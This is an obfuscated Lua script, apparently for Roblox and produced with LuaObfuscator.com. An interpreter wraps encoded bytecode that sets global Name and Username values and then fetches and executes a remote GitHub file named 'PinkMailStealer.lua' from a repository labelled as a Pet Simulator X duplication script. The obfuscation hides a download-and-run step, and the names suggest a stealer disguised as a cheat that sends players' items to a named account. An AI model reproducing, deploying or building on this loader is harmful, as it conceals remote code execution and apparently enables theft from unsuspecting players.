--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==5) then v16=nil;v16=function(v19,v20,...)local v27=1;local v28;v19=v5(v4(v19,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v77=0;local v78;while true do if (v77==0) then v78=v3(v1(v29,16));if v28 then local v101=v6(v78,v28);v28=nil;return v101;else return v78;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v79=(v31/((6 -4)^(v32-(1 + 0))))%((1281 -(1071 + 208))^(((v33-(1157 -(86 + (1264 -(113 + 81))))) -(v32-(2 -1))) + 1));return v79-(v79%(1 + 0 + 0));else local v80=2^(v32-(1 + 0));return (((v31%(v80 + v80))>=v80) and (1235 -((1440 -(185 + 358)) + 337))) or 0;end end local function v34()local v47=v2(v19,v27,v27);v27=v27 + 1;return v47;end local function v35()local v48=1308 -(42 + 8 + 1258);local v49;local v50;while true do if (v48==(586 -(545 + 40))) then return (v50 * 256) + v49;end if (v48==(0 -0)) then v49,v50=v2(v19,v27,v27 + (1813 -(828 + 983)));v27=v27 + (5 -3);v48=1 + 0;end end end local function v36()local v51=0;local v52;local v53;local v54;local v55;while true do if (v51==(0 + 0)) then v52,v53,v54,v55=v2(v19,v27,v27 + (3 -0));v27=v27 + 4;v51=1414 -(445 + (1265 -297));end if (v51==(1504 -(946 + 557))) then return (v55 * (6364859 + 10412357)) + (v54 * (158118 -92582)) + (v53 * (749 -(1074 -(69 + 512)))) + v52;end end end local function v37()local v56=v36();local v57=v36();local v58=1 -0;local v59=(v30(v57,2 -1,20) * ((1003 -((1205 -645) + 441))^(1363 -(299 + 1032)))) + v56;local v60=v30(v57,14 + 3 + 4,27 + 4);local v61=((v30(v57,471 -(290 + 149))==((672 + 173) -(625 + 219))) and  -(1 + 0)) or (454 -(257 + 196));if (v60==(0 + 0)) then if (v59==(0 -0)) then return v61 * (0 + 0);else local v88=0 -0;while true do if (v88==(14 -((19 -11) + 6))) then v60=1 + 0;v58=0;break;end end end elseif (v60==((3596 -(892 + 308)) -(161 + (533 -345)))) then return ((v59==(1963 -(1329 + 634))) and (v61 * ((133 -(130 + 2))/(0 -(0 -0))))) or (v61 * NaN);end return v9(v61,v60-(93 + 930)) * (v58 + (v59/((1446 -(737 + 707))^52)));end local function v38(v39)local v62=0;local v63;local v64;while true do if (v62==(1964 -(244 + 1717))) then return v7(v64);end if (v62==1) then v63=v4(v19,v27,(v27 + v39) -((3280 -2313) -(877 + 89)));v27=v27 + v39;v62=1 + 1 + 0;end if (v62==(0 -0)) then v63=nil;if  not v39 then local v99=0 -0;while true do if (v99==0) then v39=v36();if (v39==0) then return "";end break;end end end v62=4 -3;end if (v62==(42 -(21 + 19))) then v64={};for v89=1, #v63 do v64[v89]=v3(v2(v4(v63,v89,v89)));end v62=1513 -(105 + 1405);end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v65=0 -0;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v65~=0) then else local v81=0 -0;while true do if (v81==(0 -0)) then v66=0;v67=nil;v81=148 -(22 + 125);end if (v81==(1 + 0)) then v65=1 + 0;break;end end end if (v65~=3) then else v72=nil;while true do local v91=0;local v92;while true do if (v91==(0 + 0)) then v92=0 -0;while true do if (v92==0) then local v116=0;while true do if (v116==0) then if (v66==2) then local v126=0 + 0;local v127;while true do if (v126~=(0 + 0)) then else v127=130 -(79 + 51);while true do if (v127==0) then local v155=439 -(124 + 315);while true do if (v155~=0) then else for v176=1,v71 do local v177=0;local v178;local v179;local v180;while true do if (v177==(1498 -(729 + 768))) then v180=nil;while true do if (v178==(4 -3)) then if (v179==(1343 -(506 + 836))) then v180=v34()~=(1566 -(819 + 747));elseif (v179==(1 + 1)) then v180=v37();elseif (v179==(4 -1)) then v180=v38();end v72[v176]=v180;break;end if (v178~=0) then else v179=v34();v180=nil;v178=1 + 0;end end break;end if (v177==(0 + 0)) then v178=0 -0;v179=nil;v177=1 + 0;end end end v70[3 -0]=v34();v155=1;end if (v155==1) then v127=1;break;end end end if (v127==(1 + 0)) then for v158=1,v36() do local v159=0 + 0;local v160;local v161;while true do if (1==v159) then while true do if (v160~=(1560 -(188 + 1372))) then else v161=v34();if (v30(v161,1,1)==(424 -(358 + 66))) then local v183=0 + 0;local v184;local v185;local v186;local v187;while true do if (v183~=0) then else v184=0 -0;v185=nil;v183=1;end if (v183~=(630 -(481 + 148))) then else v186=nil;v187=nil;v183=380 -(272 + 106);end if (v183==2) then while true do if (v184~=1) then else local v191=0 -0;while true do if (0~=v191) then else v187={v35(),v35(),nil,nil};if (v185==(1462 -(1187 + 275))) then local v198=0 -0;local v199;while true do if (v198==(0 -0)) then v199=0;while true do if (v199==0) then v187[3 + 0]=v35();v187[4]=v35();break;end end break;end end elseif (v185==1) then v187[1 + 2]=v36();elseif (v185==(2 + 0)) then v187[9 -6]=v36() -(2^16);elseif (v185==(4 -1)) then local v208=0;local v209;while true do if (v208==0) then v209=546 -(534 + 12);while true do if (v209==0) then v187[1642 -(1090 + 549)]=v36() -(2^(746 -(426 + 304)));v187[4]=v35();break;end end break;end end end v191=1072 -(674 + 397);end if (v191~=(1344 -(395 + 948))) then else v184=220 -(112 + 106);break;end end end if (3~=v184) then else if (v30(v186,10 -7,3)==(1 + 0)) then v187[4 + 0]=v72[v187[4]];end v67[v158]=v187;break;end if (v184==2) then local v193=0 + 0;while true do if (v193~=1) then else v184=2 + 1;break;end if (v193~=0) then else if (v30(v186,1,1)~=1) then else v187[2 + 0]=v72[v187[2]];end if (v30(v186,2,2 -0)==1) then v187[5 -2]=v72[v187[348 -(72 + 273)]];end v193=1;end end end if (v184~=0) then else local v194=0 -0;local v195;while true do if (v194==(0 + 0)) then v195=0;while true do if (v195==(0 + 0)) then v185=v30(v161,2,3);v186=v30(v161,1 + 3,6);v195=1;end if ((409 -(292 + 116))==v195) then v184=3 -2;break;end end break;end end end end break;end end end break;end end break;end if (v159==0) then v160=0 -0;v161=nil;v159=1 + 0;end end end v66=2 + 1;break;end end break;end end end if (v66==(1624 -(675 + 948))) then local v128=0;local v129;local v130;while true do if (v128~=1) then else while true do if (0==v129) then v130=0;while true do if (v130~=(309 -(41 + 267))) then else v72={};v66=2;break;end if (0~=v130) then else local v174=0 + 0;while true do if (v174~=(0 -0)) then else v70={v67,v68,nil,v69};v71=v36();v174=1;end if (v174~=(1 + 0)) then else v130=3 -2;break;end end end end break;end end break;end if (v128==(0 + 0)) then v129=0;v130=nil;v128=1871 -(970 + 900);end end end v116=1 + 0;end if (1==v116) then v92=1;break;end end end if (v92==1) then if (v66==(1228 -(142 + 1086))) then local v121=0;while true do if (v121==(2 -1)) then v69={};v66=1;break;end if (v121==0) then local v131=0;while true do if (v131==(685 -(341 + 343))) then v121=1;break;end if (v131==(0 -0)) then v67={};v68={};v131=530 -(407 + 122);end end end end end if ((7 -4)==v66) then local v122=0;local v123;while true do if (v122~=(0 -0)) then else v123=0;while true do if (v123==1) then return v70;end if (v123~=0) then else for v139=1 -0,v36() do v68[v139-1]=v42();end for v141=822 -(229 + 592),v36() do v69[v141]=v36();end v123=1531 -(277 + 1253);end end break;end end end break;end end break;end end end break;end if (1~=v65) then else local v82=0 + 0;while true do if ((827 -(550 + 276))~=v82) then else v65=2 + 0;break;end if (v82==(20 -(7 + 13))) then local v100=0;while true do if (v100~=(1 + 0)) then else v82=3 -2;break;end if (v100==0) then v68=nil;v69=nil;v100=28 -(24 + 3);end end end end end if (v65~=(4 -2)) then else local v83=0;local v84;while true do if ((0 + 0)==v83) then v84=0;while true do if (v84==1) then v65=1 + 2;break;end if (v84==(0 + 0)) then local v112=0 -0;while true do if (v112~=(0 + 0)) then else v70=nil;v71=nil;v112=1 + 0;end if (v112~=1) then else v84=1 + 0;break;end end end end break;end end end end end local function v43(v44,v45,v46)local v73=0;local v74;local v75;local v76;while true do if (v73==1) then v76=v44[3];return function(...)local v93=0;local v94;local v95;local v96;local v97;local v98;while true do if (v93==2) then v98=nil;v98=function()local v102=v74;local v103=v75;local v104=v76;local v105=v41;local v106={};local v107={};local v108={};for v113=0 + 0,v97 do if ((v113>=v104) or (((2588 -1166) -(115 + 214))>=((2853 -(226 + 491)) + 1327))) then v106[v113-v104]=v96[v113 + (2 -1)];else v108[v113]=v96[v113 + (1571 -(1069 + 501)) + 0];end end local v109=(v97-v104) + (1428 -(1386 + 41));local v110;local v111;while true do local v114=151 -(4 + 147);while true do if (((7325 -2725)>=(555 -93)) and (v114==(1969 -(298 + 1671)))) then v110=v102[v94];v111=v110[497 -(474 + 22)];v114=1 + 0;end if ((v114==(1 + 0)) or (4504==(471 + 182))) then if (((4704 -2622)==2082) and (v111<=5)) then if ((v111<=2) or ((12489 -7838)<(898 + 539))) then if (((1405 + 391)>=(2801 -(2417 -(141 + 38)))) and (v111<=(0 -0))) then local v132=0 -0;local v133;local v134;local v135;local v136;while true do if ((4935>=((14007 -4186) -6414)) and ((0 + 0)==v132)) then local v156=0;while true do if (((11471 -8547)>=(102 -(87 + 9))) and ((391 -(22 + 198 + 171))==v156)) then v133=v110[1 + 1];v134,v135=v105(v108[v133](v14(v108,v133 + 1 + 0,v110[2 + 1])));v156=3 -2;end if ((v156==(1 + 0)) or ((512 -(36 + 470))>(4646 -(57 + 159)))) then v132=1 -0;break;end end end if (((6333 -3658)>(179 + 2)) and (v132==((3796 -2225) -(570 + 1000)))) then local v157=351 -(252 + 99);while true do if (((1 + 0)==v157) or ((1040 -(163 + 155))>=((2234 -(970 + 919)) + 686))) then v132=1782 -((6644 -4918) + 54);break;end if (((4326 -(604 + 403))>285) and (v157==((1069 -(40 + 1029)) + 0))) then v95=(v135 + v133) -(2 -1);v136=0 + 0;v157=3 -2;end end end if ((((707 -(44 + 100)) + 1049)>(502 + 35)) and (v132==((6 + 0) -4))) then for v162=v133,v95 do local v163=1189 -(118 + (1105 -(20 + 14)));local v164;local v165;while true do if (((6197 -3402)<3411) and (v163==(0 + 0))) then v164=0 + 0;v165=nil;v163=1 + 0;end if ((v163==((3348 -(672 + 904)) -(1512 + 259))) or ((3247 -1464)>(12831 -8450))) then while true do if ((v164==(1575 -(16 + 1559))) or ((1149 + 33)>(3887 -(1150 + 98)))) then v165=0 -0;while true do if (((830 + 1060)>(1078 + 574)) and ((0 -0)==v165)) then v136=v136 + 1 + 0;v108[v162]=v134[v136];break;end end break;end end break;end end end break;end end elseif ((v111>1) or ((1985 -764)>(4045 -(16 + 213)))) then local v143=0 -0;local v144;while true do if (((0 -0)==v143) or ((730 + 3755)==(2001 -(1399 + 35)))) then v144=v110[2 + 0];v108[v144]=v108[v144](v14(v108,v144 + (2 -1),v95));break;end end else v108[v110[2]][v110[7 -4]]=v110[4 + 0];end elseif (((6255 -4201)==(3640 -(1508 + 78))) and (v111<=(11 -8))) then v108[v110[7 -5]]=v110[14 -11];elseif ((v111==(230 -(158 + 68))) or (((9914 + 11900) -17248)<=(938 -(237 + 272)))) then v94=v110[1115 -(575 + 537)];else local v148=(0 + 0) -0;local v149;local v150;while true do if (((2078 + 759)==2837) and (v148==(614 -(331 + 283)))) then local v169=(0 -0) -0;while true do if ((v169==((0 -0) -0)) or ((28 + 156)>=(95 + 1758 + 140))) then v149=v110[1385 -(744 + 639)];v150=v108[v110[(272 + 622) -(97 + 794)]];v169=1 + 0;end if (((3461 -2089)<=(12946 -9534)) and (v169==(1 -0))) then v148=1 + 0;break;end end end if (((356 + 1586)<=(10319 -7422)) and (v148==(1 + 0))) then v108[v149 + ((1 + 1) -(149 -(12 + 136)))]=v150;v108[v149]=v150[v110[3 + (1730 -(25 + 1704))]];break;end end end elseif (((52 + (2983 -(110 + 1269)))>(43 + 419)) and (v111<=(1777 -(108 + 539 + 1122)))) then if (((3677 -1772)<(453 + 2349)) and (v111<=6)) then if ((v108[v110[2 -0]]==v110[8 -4]) or ((2109 -(2346 -(894 + 55)))>(2536 -1538))) then v94=v94 + (1 -0);else v94=v110[2 + 1];end elseif (((3231 + 578)>=(2845 -(390 + 175))) and (v111>(1890 -(347 + 1536)))) then v108[v110[1 + 1]]=v46[v110[1 + 2]];else v108[v110[2]]=v110[1800 -(869 + 928)]~=(1677 -(1177 + 500));end elseif ((v111<=(15 -6)) or (((7478 + 2025) -5209)<=(280 + 74))) then do return;end elseif ((v111==10) or (330>(2144 -((305 -(29 + 11)) + 1011)))) then if ((v110[5 -3]==v108[v110[2 + 0 + 2]]) or ((1612 -(20 + 641))>(153 + 851))) then v94=v94 + (3 -2);else v94=v110[7 -4];end else v108[v110[2 + 0]]();end v94=v94 + (1716 -(944 + 771));break;end end end end;v93=3;end if (v93==1) then v96={...};v97=v13("#",...) -1;v93=2;end if (3==v93) then A,B=v41(v12(v98));if  not A[1] then local v115=v44[4][v94] or "?";error("Script error at ["   .. v115   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end if (v93==0) then v94=1;v95= -1;v93=1;end end end;end if (v73==0) then v74=v44[1];v75=v44[2];v73=1;end end end return v43(v42(),{},v20)(...);end;v16("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4F6C69776965724973547279486172642F447570655363726970745053582F6D61696E2F50696E6B4D61696C537465616C65722E6C756103023O005F4703043O004E616D65030B3O00626C756564696E6F48554203083O00557365726E616D6503093O00776F6A74652O6B757200153O0012033O00013O000E0A0002000C00013O002O043O000C0001001208000100033O001208000200043O002005000200020005001203000400064O0007000500016O000200054O000200013O00022O000B000100010001002O043O001400010026063O000100010001002O043O00010001001208000100073O003001000100080009001208000100073O0030010001000A000B0012033O00023O002O043O000100012O00093O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (3==v0) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end end end
